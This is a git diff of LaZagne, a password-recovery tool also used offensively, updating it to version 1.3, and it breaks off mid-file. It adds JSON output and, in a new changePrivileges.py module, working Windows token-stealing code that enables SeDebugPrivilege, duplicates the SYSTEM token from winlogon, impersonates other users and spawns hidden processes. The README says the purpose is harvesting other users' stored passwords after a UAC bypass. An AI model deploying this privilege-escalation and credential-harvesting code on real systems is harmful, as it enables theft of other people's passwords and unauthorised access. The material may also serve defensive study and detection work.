diff --git a/CHANGELOG b/CHANGELOG old mode 100644 new mode 100755 index 41aa1dd3..68f9a4fe --- a/CHANGELOG +++ b/CHANGELOG @@ -1,3 +1,16 @@ +LaZagne 1.3 (02/07/2016) +- Only Windows +See "User impersonnation" in README for more information + * User impersonation (high privileges needed) + * Stealing user process token (when other user processes are running on the system) + * All credentials can be retrieved (Chrome, Firefox, etc.) + * Browsing file system (ex: C:\Users\\...) + * Only software's passwords which do not use Windows API to encrypt it, can be retrieved (Firefox, Jitsi, Pidgin, etc.). + * Json output has been implemented (txt output is still present with the options -oN) + * Lazagne all -oJ => Json output + * Standalone lighter (from 18 Mo to 6 Mo) => Thanks to the new version of Pyinstaller + * Fix some bugs + LaZagne 1.1 (22/10/2015) - Only Windows * New category: games (Thanks to David Lodge) diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/Linux/src/LaZagne.py b/Linux/src/LaZagne.py old mode 100644 new mode 100755 index d43cdac5..907dc193 --- a/Linux/src/LaZagne.py +++ b/Linux/src/LaZagne.py @@ -11,11 +11,13 @@ import argparse import time, sys, os import logging +import json +import getpass from softwares.browsers.mozilla import Mozilla # Configuration from config.header import Header -from config.write_output import write_header, write_footer, print_footer +from config.write_output import write_header, write_footer, print_footer, parseJsonResultToBuffer from config.constant import * from config.manageModules import get_categories, get_modules @@ -36,12 +38,27 @@ modules['mails']['thunderbird'] = Mozilla(True) # For thunderbird (firefox and thunderbird use the same class) def output(): - if args['write'] == True: + if args['write_normal']: constant.output = 'txt' + + if args['write_json']: + constant.output = 'json' + + if args['write_all']: + constant.output = 'all' + + if constant.output: if not os.path.exists(constant.folder_name): os.makedirs(constant.folder_name) + # constant.file_name_results = 'credentials' # let the choice of the name to the user + + if constant.output != 'json': write_header() - del args['write'] + + # Remove all unecessary variables + del args['write_normal'] + del args['write_json'] + del args['write_all'] def verbosity(): # Write on the console + debug file @@ -136,8 +153,10 @@ def error(self, message): # Output PWrite = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)) -PWrite._optionals.title = 'output' -PWrite.add_argument('-w', dest='write', action= 'store_true', help = 'write a text file on the current directory') +PWrite._optionals.title = 'Output' +PWrite.add_argument('-oN', dest='write_normal', action='store_true', help = 'output file in a readable format') +PWrite.add_argument('-oJ', dest='write_json', action='store_true', help = 'output file in a json format') +PWrite.add_argument('-oA', dest='write_all', action='store_true', help = 'output file in all format') # ------------------------------------------- Add options and suboptions to all modules ------------------------------------------- all_subparser = [] @@ -188,11 +207,26 @@ def error(self, message): start_time = time.time() output() verbosity() + +user = getpass.getuser() +constant.finalResults = {} +constant.finalResults['User'] = user + +print '\n\n########## User: %s ##########\n' % user arguments.func() +if constant.output == 'json' or constant.output == 'all': + # Human readable Json format + prettyJson = json.dumps(constant.finalResults, sort_keys=True, indent=4, separators=(',', ': ')) + with open(constant.folder_name + os.sep + constant.file_name_results + '.json', 'w+') as f: + json.dump(prettyJson, f) + # Print the number of passwords found -if constant.output == 'txt': +if constant.output == 'txt' or constant.output == 'all': + with open(constant.folder_name + os.sep + constant.file_name_results + '.txt', 'a+b') as f: + f.write(parseJsonResultToBuffer(constant.finalResults).encode('utf-8')) write_footer() + print_footer() elapsed_time = time.time() - start_time diff --git a/Linux/src/config/__init__.py b/Linux/src/config/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/color.py b/Linux/src/config/color.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/constant.py b/Linux/src/config/constant.py old mode 100644 new mode 100755 index f6de3d0e..a7fff846 --- a/Linux/src/config/constant.py +++ b/Linux/src/config/constant.py @@ -1,8 +1,9 @@ class constant(): folder_name = 'results' + file_name_results = 'credentials' # the extention is added depending on the user output choice MAX_HELP_POSITION = 27 - CURRENT_VERSION = '1.0' + CURRENT_VERSION = '1.1' output = None file_logger = None verbose = False @@ -20,3 +21,5 @@ class constant(): # total password found nbPasswordFound = 0 passwordFound = [] + + finalResults = {} diff --git a/Linux/src/config/dico.py b/Linux/src/config/dico.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/header.py b/Linux/src/config/header.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/manageModules.py b/Linux/src/config/manageModules.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/moduleInfo.py b/Linux/src/config/moduleInfo.py old mode 100644 new mode 100755 diff --git a/Linux/src/config/write_output.py b/Linux/src/config/write_output.py old mode 100644 new mode 100755 index 320a68a2..6d551bb1 --- a/Linux/src/config/write_output.py +++ b/Linux/src/config/write_output.py @@ -7,6 +7,7 @@ from config.color import bcolors from config.constant import constant import logging +import json # --------------------------- Functions used to write --------------------------- @@ -39,13 +40,17 @@ def write_credentials(pwdFound, category): open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): + # if values: + # if constant.output == 'txt': + # try: + # write_credentials(values, category) + # logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) + # except: + # logging.info('Couldn\'t write the results file\n') if values: - if constant.output == 'txt': - try: - write_credentials(values, category) - logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) - except: - logging.info('Couldn\'t write the results file\n') + if "Passwords" not in constant.finalResults: + constant.finalResults["Passwords"] = [] + constant.finalResults["Passwords"].append([{"Category": category}, values]) # --------------------------- End of functions used to write --------------------------- @@ -136,4 +141,30 @@ def print_debug(error_level, message): else: logging.info('[%s] %s' % (error_level, message)) -# --------------------------- End of output functions --------------------------- \ No newline at end of file +# --------------------------- End of output functions --------------------------- + +def parseJsonResultToBuffer(jsonString): + buffer = '' + try: + if jsonString: + buffer += '\r\n\r\n########## User: %s ##########\r\n' % jsonString['User'] + if 'Passwords' not in jsonString: + buffer += 'No passwords found for this user !' + else: + for all_passwords in jsonString['Passwords']: + # print '- Category: %s' % all_passwords[0]['Category'] + buffer += '------------------- %s -----------------\r\n' % all_passwords[0]['Category'] + for password_by_category in all_passwords[1]: + buffer += '\r\nPassword found !!!\r\n' + for dic in password_by_category.keys(): + try: + buffer += '%s: %s\r\n' % (dic, password_by_category[dic]) + except: + buffer += '%s: %s\r\n' % (dic, password_by_category[dic].encode('utf-8')) + buffer += '\r\n' + + except Exception as e: + print_debug('ERROR', 'Error parsing the json results: %s' % e) + print_debug('ERROR', 'json content: %s' % jsonString) + + return buffer \ No newline at end of file diff --git a/Linux/src/softwares/__init__.py b/Linux/src/softwares/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/browsers/__init__.py b/Linux/src/softwares/browsers/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/browsers/mozilla.py b/Linux/src/softwares/browsers/mozilla.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/browsers/opera.py b/Linux/src/softwares/browsers/opera.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/chats/__init__.py b/Linux/src/softwares/chats/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/chats/jitsi.py b/Linux/src/softwares/chats/jitsi.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/chats/pbkdf2.py b/Linux/src/softwares/chats/pbkdf2.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/chats/pidgin.py b/Linux/src/softwares/chats/pidgin.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/databases/__init__.py b/Linux/src/softwares/databases/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/databases/dbvis.py b/Linux/src/softwares/databases/dbvis.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/databases/sqldeveloper.py b/Linux/src/softwares/databases/sqldeveloper.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/databases/squirrel.py b/Linux/src/softwares/databases/squirrel.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/sysadmin/__init__.py b/Linux/src/softwares/sysadmin/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/sysadmin/env_variable.py b/Linux/src/softwares/sysadmin/env_variable.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/sysadmin/filezilla.py b/Linux/src/softwares/sysadmin/filezilla.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/sysadmin/shadow.py b/Linux/src/softwares/sysadmin/shadow.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wallet/__init__.py b/Linux/src/softwares/wallet/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wallet/gnome.py b/Linux/src/softwares/wallet/gnome.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wallet/kde.py b/Linux/src/softwares/wallet/kde.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wifi/__init__.py b/Linux/src/softwares/wifi/__init__.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wifi/wifi.py b/Linux/src/softwares/wifi/wifi.py old mode 100644 new mode 100755 diff --git a/Linux/src/softwares/wifi/wpa_supplicant.py b/Linux/src/softwares/wifi/wpa_supplicant.py old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 14f8ac5f..5869826b --- a/README.md +++ b/README.md @@ -32,8 +32,8 @@ Usage * example: laZagne.exe browsers -f * help: laZagne.exe browsers -h -* Write all passwords found into a file (-w options) - * cmd: laZagne.exe all -w +* Write all passwords found into a file (-oN for Normal txt, -oJ for Json, -oA for All) + * cmd: laZagne.exe all -oN * Use a file for dictionary attacks (used only when it's necessary: mozilla masterpassword, system hahes, etc.). The file has to be a wordlist in cleartext (no rainbow), it has not been optmized to be fast but could useful for basic passwords. * cmd: laZagne.exe all -path file.txt @@ -50,6 +50,13 @@ Supported software (*) used by many tools to store passwords: Chrome, Owncloud, Evolution, KMail, etc. +User impersonnation +---- +When laZagne is launched with admin privileges (UAC bypassed) or System, it manages to retrieve passwords from other user. +It uses two ways to do that: + * If a process from another user is launched (using runas or if many users are connected to the same host), it manages to steal a process token to launch laZagne with its privileges (this is the best way). It could retrieve passwords stored encrypted with the Windows API. + * If no process has been launched but other user exists (visible on the file system in C:\Users\...), it browses the file system in order to retrieve passwords from these users. However, it could not retrieve passwords encrypted with the Windows API (we have to be on the same context as the user to decrypt these passwords). Only few passwords could be retrieved (Firefox, Jitsi, Dbvis, etc.). + IE Browser history ---- Internet Explorer passwords (from IE7 and before Windows 8) can only be decrypted using the URL of the website. This one is used as an argument of the Win32CryptUnprotectData api. Thus, using the browsing history of ie will permit to decrypt many passwords. @@ -91,14 +98,16 @@ To compile the source code, some external libraries are required. * PyCrypto: pip install pycrypto * Impacket (for Windows hashes + LSA Secrets): https://github.com/CoreSecurity/impacket * Pyasn1 (for ASN1 decoding): https://pypi.python.org/pypi/pyasn1/ + * Microsoft Visual C++ 2010 Redistributable Package (x86): https://www.microsoft.com/en-us/download/details.aspx?id=5555 * For Linux * Python 2.7 * Argparse * PyCrypto: https://www.dlitz.net/software/pycrypto/ * Dbus (Pidgin) - * Python-kde4 (Kwallet) * Pyasn1 (for ASN1 decoding): https://pypi.python.org/pypi/pyasn1/ + * Python Gnome keyring: apt-get install python-gnomekeyring + * Python-kde4 (Kwallet): apt-get install python-kde4 ---- | __Alessandro ZANNI__ | diff --git a/Windows/src/LaZagne/config/__init__.py b/Windows/src/LaZagne/config/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/config/changePrivileges.py b/Windows/src/LaZagne/config/changePrivileges.py new file mode 100755 index 00000000..ed51ffbe --- /dev/null +++ b/Windows/src/LaZagne/config/changePrivileges.py @@ -0,0 +1,372 @@ +#original code from https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py +import sys, os +from ctypes import * +import subprocess +import psutil +from config.write_output import print_debug + +LPVOID = c_void_p +PVOID = LPVOID +PSID = PVOID +DWORD = c_uint32 +LPSTR = c_char_p +HANDLE = LPVOID +INVALID_HANDLE_VALUE = c_void_p(-1).value +LONG = c_long +WORD = c_uint16 + +READ_CONTROL = 0x00020000L +STANDARD_RIGHTS_READ = READ_CONTROL +STANDARD_RIGHTS_REQUIRED = 0x000F0000L + +TOKEN_ASSIGN_PRIMARY = 0x0001 +TOKEN_DUPLICATE = 0x0002 +TOKEN_IMPERSONATE = 0x0004 +TOKEN_QUERY = 0x0008 +TOKEN_QUERY_SOURCE = 0x0010 +TOKEN_ADJUST_PRIVILEGES = 0x0020 +TOKEN_ADJUST_GROUPS = 0x0040 +TOKEN_ADJUST_DEFAULT = 0x0080 +TOKEN_ADJUST_SESSIONID = 0x0100 +TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) +tokenprivs = (TOKEN_QUERY | TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_QUERY_SOURCE | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | (131072L | 4)) +TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | + TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | + TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | + TOKEN_ADJUST_SESSIONID) + +PROCESS_QUERY_INFORMATION = 0x0400 + +class LUID(Structure): + _fields_ = [ + ("LowPart", DWORD), + ("HighPart", LONG), + ] + +class SID_AND_ATTRIBUTES(Structure): + _fields_ = [ + ("Sid", PSID), + ("Attributes", DWORD), + ] + +class TOKEN_USER(Structure): + _fields_ = [ + ("User", SID_AND_ATTRIBUTES),] + +class LUID_AND_ATTRIBUTES(Structure): + _fields_ = [ + ("Luid", LUID), + ("Attributes", DWORD), + ] + +class TOKEN_PRIVILEGES(Structure): + _fields_ = [ + ("PrivilegeCount", DWORD), + ("Privileges", LUID_AND_ATTRIBUTES), + ] + +class PROCESS_INFORMATION(Structure): + _fields_ = [ + ('hProcess', HANDLE), + ('hThread', HANDLE), + ('dwProcessId', DWORD), + ('dwThreadId', DWORD), + ] + +class STARTUPINFO(Structure): + _fields_ = [ + ('cb', DWORD), + ('lpReserved', LPSTR), + ('lpDesktop', LPSTR), + ('lpTitle', LPSTR), + ('dwX', DWORD), + ('dwY', DWORD), + ('dwXSize', DWORD), + ('dwYSize', DWORD), + ('dwXCountChars', DWORD), + ('dwYCountChars', DWORD), + ('dwFillAttribute', DWORD), + ('dwFlags', DWORD), + ('wShowWindow', WORD), + ('cbReserved2', WORD), + ('lpReserved2', LPVOID), # LPBYTE + ('hStdInput', HANDLE), + ('hStdOutput', HANDLE), + ('hStdError', HANDLE), + ] + +def GetUserName(): + nSize = DWORD(0) + windll.advapi32.GetUserNameA(None, byref(nSize)) + error = GetLastError() + + ERROR_INSUFFICIENT_BUFFER = 122 + if error != ERROR_INSUFFICIENT_BUFFER: + raise WinError(error) + + lpBuffer = create_string_buffer('', nSize.value + 1) + + success = windll.advapi32.GetUserNameA(lpBuffer, byref(nSize)) + if not success: + raise WinError() + return lpBuffer.value + +def GetTokenSid(hToken): + """Retrieve SID from Token""" + dwSize = DWORD(0) + pStringSid = LPSTR() + #print "hToken: %s"%hToken.value + TokenUser = 1 + r=windll.advapi32.GetTokenInformation(hToken, TokenUser, byref(TOKEN_USER()), 0, byref(dwSize)) + if r!=0: + raise WinError() + address = windll.kernel32.LocalAlloc(0x0040, dwSize) + windll.advapi32.GetTokenInformation(hToken, TokenUser, address, dwSize, byref(dwSize)) + pToken_User = cast(address, POINTER(TOKEN_USER)) + windll.advapi32.ConvertSidToStringSidA(pToken_User.contents.User.Sid, byref(pStringSid)) + sid = pStringSid.value + windll.kernel32.LocalFree(address) + return sid + +def EnablePrivilege(privilegeStr, hToken = None): + """Enable Privilege on token, if no token is given the function gets the token of the current process.""" + if hToken == None: + TOKEN_ADJUST_PRIVILEGES = 0x00000020 + TOKEN_QUERY = 0x0008 + hToken = HANDLE(INVALID_HANDLE_VALUE) + hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, windll.kernel32.GetCurrentProcessId()) + windll.advapi32.OpenProcessToken( hProcess, (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), byref(hToken) ) + e=GetLastError() + # if e!=0: + # raise WinError(e) + windll.kernel32.CloseHandle(hProcess) + + privilege_id = LUID() + windll.advapi32.LookupPrivilegeValueA(None, privilegeStr, byref(privilege_id)) + e=GetLastError() + if e!=0: + raise WinError(e) + + SE_PRIVILEGE_ENABLED = 0x00000002 + laa = LUID_AND_ATTRIBUTES(privilege_id, SE_PRIVILEGE_ENABLED) + tp = TOKEN_PRIVILEGES(1, laa) + + windll.advapi32.AdjustTokenPrivileges(hToken, False, byref(tp), sizeof(tp), None, None) + e=GetLastError() + if e!=0: + raise WinError(e) + +def ListSids(): + sids=[] + + for proc in psutil.process_iter(): + try: + pinfo = proc.as_dict(attrs=['pid', 'username', 'name']) + except psutil.NoSuchProcess: + pass + if pinfo['pid']<=4: + continue + if pinfo['username'] is None: + continue + try: + hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid'])) + hToken = HANDLE(INVALID_HANDLE_VALUE) + windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken)) + + try: + sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username'])) + except: + pass + windll.kernel32.CloseHandle(hToken) + windll.kernel32.CloseHandle(hProcess) + except Exception as e: + print_debug('ERROR', str(e)) + return list(sids) + +def getProcessToken(pid): + hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid) + hToken = HANDLE(INVALID_HANDLE_VALUE) + windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken)) + windll.kernel32.CloseHandle(hProcess) + return hToken + +def getSidToken(token_sid): + + if token_sid == "S-1-5-18": + sids = ListSids() + for sid in sids: + if "winlogon" in sid[1].lower(): + try: + hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, sid[0]) + + hToken = HANDLE(INVALID_HANDLE_VALUE) + windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken)) + + print_debug('INFO', 'Using PID: ' + str(sid[0])) + windll.kernel32.CloseHandle(hProcess) + return hToken + windll.kernel32.CloseHandle(hToken) + windll.kernel32.CloseHandle(hProcess) + + except Exception, e : + print_debug('ERROR', str(e)) + return + + pids = [int(x) for x in psutil.pids() if int(x)>4] + + for pid in pids: + try: + hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pid)) + + error=GetLastError() + hToken = HANDLE(INVALID_HANDLE_VALUE) + windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken)) + + ##If token SID is the SID of SYSTEM, return the token handle. + # print "sid: %s %s"%(pid,GetTokenSid(hToken)) + if GetTokenSid( hToken ) == token_sid: + print_debug('INFO', 'Using PID: ' + str(pid)) + windll.kernel32.CloseHandle(hProcess) + return hToken + + windll.kernel32.CloseHandle(hToken) + windll.kernel32.CloseHandle(hProcess) + + except Exception, e : + print_debug('ERROR', str(e)) + + +def impersonate_pid(pid, close=True): + EnablePrivilege("SeDebugPrivilege") + hToken = getProcessToken(pid) + hTokendupe=impersonate_token(hToken) + if close: + windll.kernel32.CloseHandle(hTokendupe) + return hTokendupe + +def impersonate_sid(sid, close=True): + EnablePrivilege("SeDebugPrivilege") + hToken = getSidToken(sid) + hTokendupe=impersonate_token(hToken) + if close: + windll.kernel32.CloseHandle(hTokendupe) + return hTokendupe + +global_ref=None +def impersonate_sid_long_handle(*args, **kwargs): + global global_ref + hTokendupe=impersonate_sid(*args, **kwargs) + try: + if global_ref is not None: + windll.kernel32.CloseHandle(global_ref) + except: + pass + global_ref=hTokendupe + return addressof(hTokendupe) + +def impersonate_pid_long_handle(*args, **kwargs): + global global_ref + hTokendupe=impersonate_pid(*args, **kwargs) + try: + if global_ref is not None: + windll.kernel32.CloseHandle(global_ref) + except: + pass + global_ref=hTokendupe + return addressof(hTokendupe) + +def impersonate_token(hToken): + if not windll.Shell32.IsUserAnAdmin(): + print_debug('ERROR', 'You need admin rights to run impersonate !') + EnablePrivilege("SeDebugPrivilege") + #hToken = getProcessToken(pid) + hTokendupe = HANDLE( INVALID_HANDLE_VALUE ) + SecurityImpersonation = 2 + TokenPrimary = 1 + if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ): + WinError() + windll.kernel32.CloseHandle(hToken) + + try: + EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe) + except Exception as e: + pass + try: + EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe) + except Exception as e: + pass + try: + EnablePrivilege("SeImpersonatePrivilege") + except Exception as e: + pass + + if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe): + return + + return hTokendupe + +def create_proc_as_sid(sid, prog="cmd.exe"): + # if not windll.Shell32.IsUserAnAdmin(): + # raise OSError("You need admin rights to run getsystem !") + hTokendupe=impersonate_sid(sid, close=False) + pid=start_proc_with_token([prog], hTokendupe) + windll.kernel32.CloseHandle(hTokendupe) + return pid + +def getsystem(prog="cmd.exe"): + return create_proc_as_sid("S-1-5-18", prog=prog) + + +def start_proc_with_token(args, hTokendupe, hidden=True): + ##Start the process with the token. + lpProcessInformation = PROCESS_INFORMATION() + lpStartupInfo = STARTUPINFO() + if hidden: + lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP + lpStartupInfo.wShowWindow = subprocess.SW_HIDE + + CREATE_NEW_CONSOLE = 0x00000010 + CREATE_UNICODE_ENVIRONMENT = 0x00000400 + NORMAL_PRIORITY_CLASS = 0x00000020 + + dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE + + userenv = WinDLL('userenv', use_last_error=True) + userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int) + userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,) + cenv = c_void_p() + + success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0) + if not success: + return + + success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation)) + if not success: + return + + print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId)) + return lpProcessInformation.dwProcessId + +def rev2self(): + global global_ref + windll.advapi32.RevertToSelf() + try: + if global_ref is not None: + windll.kernel32.CloseHandle(global_ref) + except: + pass + global_ref=None + print_debug('INFO', 'Running as: ' + GetUserName()) + +# check if this process has been launched from another lazagne.exe +def isChildProcess(current_filepath): + if 'ALLUSERSPROFILE' in os.environ: + if os.environ['ALLUSERSPROFILE'] in current_filepath: + return True + return False + +def isProcessStillAlive(pid): + try: + return psutil.Process(pid) + except: + return None diff --git a/Windows/src/LaZagne/config/constant.py b/Windows/src/LaZagne/config/constant.py old mode 100644 new mode 100755 index 527053f2..cbc1e7bb --- a/Windows/src/LaZagne/config/constant.py +++ b/Windows/src/LaZagne/config/constant.py @@ -1,10 +1,13 @@ class constant(): folder_name = 'results' + file_name_results = 'credentials' # the extention is added depending on the user output choice MAX_HELP_POSITION = 27 - CURRENT_VERSION = '1.1' - output = None - file_logger = None + CURRENT_VERSION = '1.3' + output = None + file_logger = None + + # tmpFile # jitsi options jitsi_masterpass = None @@ -22,3 +25,7 @@ class constant(): # total password found nbPasswordFound = 0 passwordFound = [] + + finalResults = {} + userprofile = '' + appdata = '' diff --git a/Windows/src/LaZagne/config/dico.py b/Windows/src/LaZagne/config/dico.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/config/get_system_priv.py b/Windows/src/LaZagne/config/get_system_priv.py old mode 100644 new mode 100755 index 67e5bbc6..d989e223 --- a/Windows/src/LaZagne/config/get_system_priv.py +++ b/Windows/src/LaZagne/config/get_system_priv.py @@ -137,7 +137,7 @@ def EnablePrivilege(privilegeStr, hToken = None): laa = LUID_AND_ATTRIBUTES(privilege_id, SE_PRIVILEGE_ENABLED) tp = TOKEN_PRIVILEGES(1, laa) - windll.advapi32.AdjustTokenPrivileges(hToken, False, byref(tp), sizeof(tp), None, None) + windll.advapi32.AdjustTokenPrivileges(hToken, False, byref(tp), sizeof(tp), None, None) def procids(): """A list of every pid, sorted but first pids is winlogon.exe""" @@ -227,7 +227,7 @@ def get_system_priv(): CREATE_NEW_CONSOLE = 0x00000010 CREATE_NO_WINDOW = 0x08000000 - windll.advapi32.CreateProcessAsUserA(hTokendupe, r"%s" % current_filepath, " wifi --HiddenWifiArgs" , None, None, True, CREATE_NO_WINDOW, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) + windll.advapi32.CreateProcessAsUserA(hTokendupe, r"%s" % current_filepath, " all" , None, None, True, CREATE_NO_WINDOW, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) except WindowsError, e : pass diff --git a/Windows/src/LaZagne/config/header.py b/Windows/src/LaZagne/config/header.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/config/manageModules.py b/Windows/src/LaZagne/config/manageModules.py old mode 100644 new mode 100755 index fc79fe0e..0a384708 --- a/Windows/src/LaZagne/config/manageModules.py +++ b/Windows/src/LaZagne/config/manageModules.py @@ -68,7 +68,7 @@ def get_modules(): Outlook(), Pidgin(), Puttycm(), - RoguesTale(), + RoguesTale(), Tortoise(), Secrets(), Skype(), diff --git a/Windows/src/LaZagne/config/moduleInfo.py b/Windows/src/LaZagne/config/moduleInfo.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/config/write_output.py b/Windows/src/LaZagne/config/write_output.py old mode 100644 new mode 100755 index 92fa8ee4..527f8cb6 --- a/Windows/src/LaZagne/config/write_output.py +++ b/Windows/src/LaZagne/config/write_output.py @@ -1 +1 @@ -# -*- coding: utf-8 -*- from constant import constant from time import gmtime, strftime import os, getpass, socket import logging from config.header import Header from colorama import init, Fore, Back, Style init() # init the colorama function # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | |\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! |\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p].encode('utf-8')) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n') # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' print footer # print output if passwords have been found def print_output(software_name, pwdFound, title1 = False): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.INFO) == False: if not title1: Header().title(software_name) toWrite = [] password_category = False for pwd in pwdFound: # detect which kinds of password has been found lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash = [s for s in lower_list if "hash" in s] if hash: password_category = hash # No password found if not password_category: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", '%s found !!!' % password_category[0].title()) toWrite.append(pwd) # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: constant.passwordFound.append(pwd[password_category[0]]) except: pass for p in pwd.keys(): try: print '%s: %s' % (p, pwd[p]) except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print '%s: %s' % (p.encode('utf-8'), pwd[p].encode('utf-8')) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.info("[!] No passwords found\n") def print_debug(error_level, message): # print when password is found if error_level == 'OK': print Fore.GREEN + message + Style.RESET_ALL # print when password is not found elif error_level == 'FAILED': print Style.BRIGHT + Fore.RED + message + Style.RESET_ALL # print messages depending of their criticism elif error_level == 'CRITICAL': logging.critical(Style.BRIGHT + Fore.RED + '[CRITICAL] %s\n' % message + Style.RESET_ALL) elif error_level == 'ERROR': logging.error(Style.BRIGHT + Fore.RED + '[ERROR] %s\n' % message + Style.RESET_ALL) elif error_level == 'WARNING': logging.warning(Fore.CYAN + '[WARNING] %s\n' % message + Style.RESET_ALL) elif error_level == 'DEBUG': logging.debug('[DEBUG] %s\n' % message) elif error_level == 'INFO': logging.info('%s\n' % message) else: logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file +# -*- coding: utf-8 -*- from constant import constant from time import gmtime, strftime import os, getpass, socket import logging import json import tempfile from config.header import Header from colorama import init, Fore, Back, Style init() # init the colorama function # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | 